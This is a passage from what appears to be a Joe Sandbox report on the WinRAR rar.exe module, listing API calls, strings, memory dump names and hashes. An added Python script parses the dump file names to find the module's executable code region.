39764 7ff69a406424 8 API calls _UnwindNestedFrames 39739->39764 39741 7ff69a3e7f56 39743 7ff69a3eb540 147 API calls 39741->39743 39743->39722 39744->39715 39745->39721 39747 7ff69a406396 39746->39747 39749 7ff69a4063a0 39746->39749 39748 7ff69a43a444 new 4 API calls 39747->39748 39748->39749 39749->39725 39750->39727 39752 7ff69a419926 39751->39752 39753 7ff69a41993c 39751->39753 39754 7ff69a3f90b8 75 API calls 39752->39754 39755 7ff69a3f90b8 75 API calls 39753->39755 39756 7ff69a419934 39754->39756 39755->39756 39756->39734 39757->39736 39762 7ff69a4196a4 39758->39762 39759 7ff69a4197d7 39760 7ff69a402574 126 API calls 39760->39762 39762->39759 39762->39760 39763 7ff69a439b98 216 API calls 39762->39763 39765 7ff69a406498 72 API calls new 39762->39765 39763->39762 39764->39741 39765->39762 39766 7ff69a449c74 39767 7ff69a449c7c 39766->39767 39768 7ff69a449cbb 39767->39768 39769 7ff69a449cac 39767->39769 39770 7ff69a449cc5 39768->39770 39788 7ff69a44ce08 32 API calls 2 library calls 39768->39788 39787 7ff69a444f3c 15 API calls abort 39769->39787 39775 7ff69a444b8c 39770->39775 39773 7ff69a449cb1 __scrt_fastfail 39776 7ff69a444bab 39775->39776 39777 7ff69a444ba1 39775->39777 39779 7ff69a444bb0 39776->39779 39783 7ff69a444bb7 __vcrt_getptd_noexit 39776->39783 39778 7ff69a444ab4 setbuf 16 API calls 39777->39778 39780 7ff69a444ba9 39778->39780 39781 7ff69a444a74 __vcrt_freefls 15 API calls 39779->39781 39780->39773 39781->39780 39782 7ff69a444bf6 39789 7ff69a444f3c 15 API calls abort 39782->39789 39783->39782 39784 7ff69a444be0 RtlReAllocateHeap 39783->39784 39786 7ff69a4436c0 new 2 API calls 39783->39786 39784->39780 39784->39783 39786->39783 39787->39773 39788->39770 39789->39780 39790 7ff69a42a924 39791 7ff69a42a949 snprintf 39790->39791 39792 7ff69a42a97f CompareStringA 39791->39792
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID:
• String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
• API String ID: 0-1628410872
• Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction ID: 3b601c8ffdcec2478fffd6e8ae2fec467556165b478d5ca654343889a7712a71
• Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction Fuzzy Hash: 1EC2AE6292C6C381FA749F2481442BD36E1EF01B84F9981FECA0ECA6D5DF6DE945E350
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID:
• String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
• API String ID: 0-1660254149
• Opcode ID: a4b2bcfa1cfb40bc8db102f4b798c0a2e8355e5dea3c7943d5ce14f76aad6685
• Instruction ID: 7769cd4ef89821c7b0bfc5c387c28b6980bf99ee6e38007f11b493b792fc1258
• Opcode Fuzzy Hash: a4b2bcfa1cfb40bc8db102f4b798c0a2e8355e5dea3c7943d5ce14f76aad6685
• Instruction Fuzzy Hash: E3E2AE26A08AC28AEB70DB26D8402FD37E1FB95788F6540B9DA4DC7796DF39D954C300

Control-flow Graph

APIs
  • Part of subcall function 00007FF69A424AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF69A3FCC90), ref: 00007FF69A424AF5
• GetModuleFileNameW.KERNEL32(?,?,?,00007FF69A417E7D), ref: 00007FF69A42492E
• GetVersionExW.KERNEL32(?,?,?,00007FF69A417E7D), ref: 00007FF69A42496A
• LoadLibraryExW.KERNELBASE(?,?,?,00007FF69A417E7D), ref: 00007FF69A424993
• LoadLibraryW.KERNEL32(?,?,?,00007FF69A417E7D), ref: 00007FF69A42499F
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                      • String ID: rarlng.dll
                                                                                                                                                                                                                                      • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                      • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                      • Instruction ID: d87ec7a0538e9b44fd9e93604a91451fdbe95ecd1a8ef4c53c83ff06f0066010
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14312E31A19A8285FB749F21E8402E933A4FB45B84F8051F5EA8DC6A98DF3DD546CB40

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A404736
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A40476B
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A40477A
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A4047A4
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF69A404620,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A4047B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 869497890-0
                                                                                                                                                                                                                                      • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                      • Instruction ID: b5a4e0b65a68e07fe55895c2ecd5d70c2cd8127fe405ee17ce783bfdde1f46a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C541DF76A08A8196EA349B25E5402F973E0FB4AFB4F4003B1EABD837C5DF6CE5558300
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1815803762-0
                                                                                                                                                                                                                                      • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                      • Instruction ID: a9268c9c6f646243343a57b1a07285ee4d173a869e60d05ac56db2b08a962c26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB016D2AB1865182F7108B16A94432AB7A1EBC5FD0F1880B5DF4ED3B68CF7DD946C700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 751630497-0
                                                                                                                                                                                                                                      • Opcode ID: d750600f3be21f8ccd2522ea66ef81f5d73d07ec8a0f66ae2bb9041de05645a8
                                                                                                                                                                                                                                      • Instruction ID: d27496310d60b8ab838ed7a5bc3eef0f1cc83a02dcf70ded01cad58b3d7cf599
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d750600f3be21f8ccd2522ea66ef81f5d73d07ec8a0f66ae2bb9041de05645a8
• Instruction Fuzzy Hash: D022B132A086C296EB25DF30D4452FEBBE0FB50B48F5480B5DA8DD7699CE78E951C740
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ee4955b49511cc911fe8b469ecfb9a50c8a330afbc075bb0d0f7ed7f2ea3295
• Instruction ID: 28811004f7c24c76426dfc1e0878d4cf549015a2967158e6b5346387b87362ba
• Opcode Fuzzy Hash: 5ee4955b49511cc911fe8b469ecfb9a50c8a330afbc075bb0d0f7ed7f2ea3295
• Instruction Fuzzy Hash: 0F710032A0568186D754DF29E5052EC33D5FB88F98F144179CF9DCB399DF3AA0428790
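The Memory Dump Source list above names each dumped region of the rar.exe module with a fixed dotted layout, and the page leaves the "Download File" link label glued to every associated entry. The following is an added example, not part of the Joe Sandbox report or its tooling, that parses those names into base address and page protection, strips the link label, and picks out the executable region, which is the dump worth handing to a YARA scan or a disassembler. The field layout (process, stage, dump id, base, protection, type, state, module) is an assumption inferred from the names on this page rather than from vendor documentation; the PAGE_* and MEM_* values are the Windows constants from winnt.h. The sample list is copied from the report entries above.

```python
"""Parse Joe Sandbox *.sdmp dump names and select the executable region.

Assumed layout (inferred from the names on this page, not documented):
    <proc>.<stage>.<dump id>.<base>.<protect>.<type>.<state>.<module>.sdmp
<protect> and <state> are read as Windows PAGE_* / MEM_* constants.
"""
import re
from dataclasses import dataclass

# Windows page-protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Windows region-type constants as reported by VirtualQuery.
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)

# Entries copied from the Memory Dump Source list above (two kept the glued link label).
DUMPS_FROM_REPORT = [
    "00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp",
    "00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File",
    "00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp",
    "00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp",
    "00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File",
]


@dataclass(frozen=True)
class Dump:
    name: str
    base: int
    protect: int
    state: int

    @property
    def protect_name(self) -> str:
        # Only the low byte carries the access bits; guard bits live above it.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def state_name(self) -> str:
        return MEM_TYPE.get(self.state, f"0x{self.state:x}")

    @property
    def executable(self) -> bool:
        # PAGE_EXECUTE* constants all sit in the high nibble of the low byte.
        return bool(self.protect & 0xF0)


def parse_sdmp(name: str) -> Dump:
    """Parse one dump file name; tolerate the page's trailing link label."""
    name = name.removesuffix("Download File").strip()
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an sdmp name: {name}")
    return Dump(name, int(m["base"], 16), int(m["protect"], 16), int(m["state"], 16))


def executable_regions(names):
    """Return the executable dumps, lowest base address first."""
    dumps = sorted((parse_sdmp(n) for n in names), key=lambda d: d.base)
    return [d for d in dumps if d.executable]


if __name__ == "__main__":
    for d in sorted((parse_sdmp(n) for n in DUMPS_FROM_REPORT), key=lambda d: d.base):
        print(f"{d.base:#018x} {d.protect_name:<22} {d.state_name} {'<- scan' if d.executable else ''}")
```

Run as a script it lists the regions in address order and flags the single executable one (the module's code section at 0x7FF69A3E1000), so a scan can be limited to that dump instead of every read-only or copy-on-write data page.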

Control-flow Graph
Rendered in the original report as an interactive graph with basic blocks marked executed or not executed; the edge list is not reproduced here. Entry block: 7ff69a423ea8-7ff69a423f03. Block calling a Windows API: 7ff69a423f05-7ff69a423f3e (GetModuleFileNameW); all other call targets are internal functions of the module.
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: FileModuleNamesnprintfwcschr
• String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
• API String ID: 602362809-1645646101
• Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
• Instruction ID: 5990c7d11fef7ab02c386d3cf469c29136af52dcf2eab67c3bff61f62d1c4877
• Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
• Instruction Fuzzy Hash: A622AD22A1869285EB30DF15D4402B973E1FF44B84F8151B6EE8ECB6D9EF6CE546C780

Control-flow Graph
Rendered in the original report as an interactive graph with basic blocks marked executed or not executed; the edge list is not reproduced here. Entry block: 7ff69a3f4fd0-7ff69a3f502d. No Windows API is called directly from this graph; every call target is an internal function of the module.
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: wcschr
• String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
• API String ID: 1497570035-1281034975
• Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction ID: 6dc8180074a1955519ca7710bdd54138f90f6955094ab4e08295e0f7963d5ac1
• Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction Fuzzy Hash: C1C19361A2C58250FB75AF2598551FC32D1EF46B84F4441FEEE4ECAADADE2CE601D301

Control-flow Graph
Rendered in the original report as an interactive graph with basic blocks marked executed or not executed; the edge list is not reproduced here. Entry block: 7ff69a427f24-7ff69a427f5c. Blocks calling Windows APIs: 7ff69a427f7e-7ff69a427fb3 (GetProcAddressForCaller, GetProcAddress) and 7ff69a42805c-7ff69a428065 (GetCurrentProcessId); the remaining call targets are internal functions of the module.
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                      • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                                      • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                      • Instruction ID: 22bd30b037593908c18f3d7135e97cae15ef47f611a4556eb1be25f5cd939693
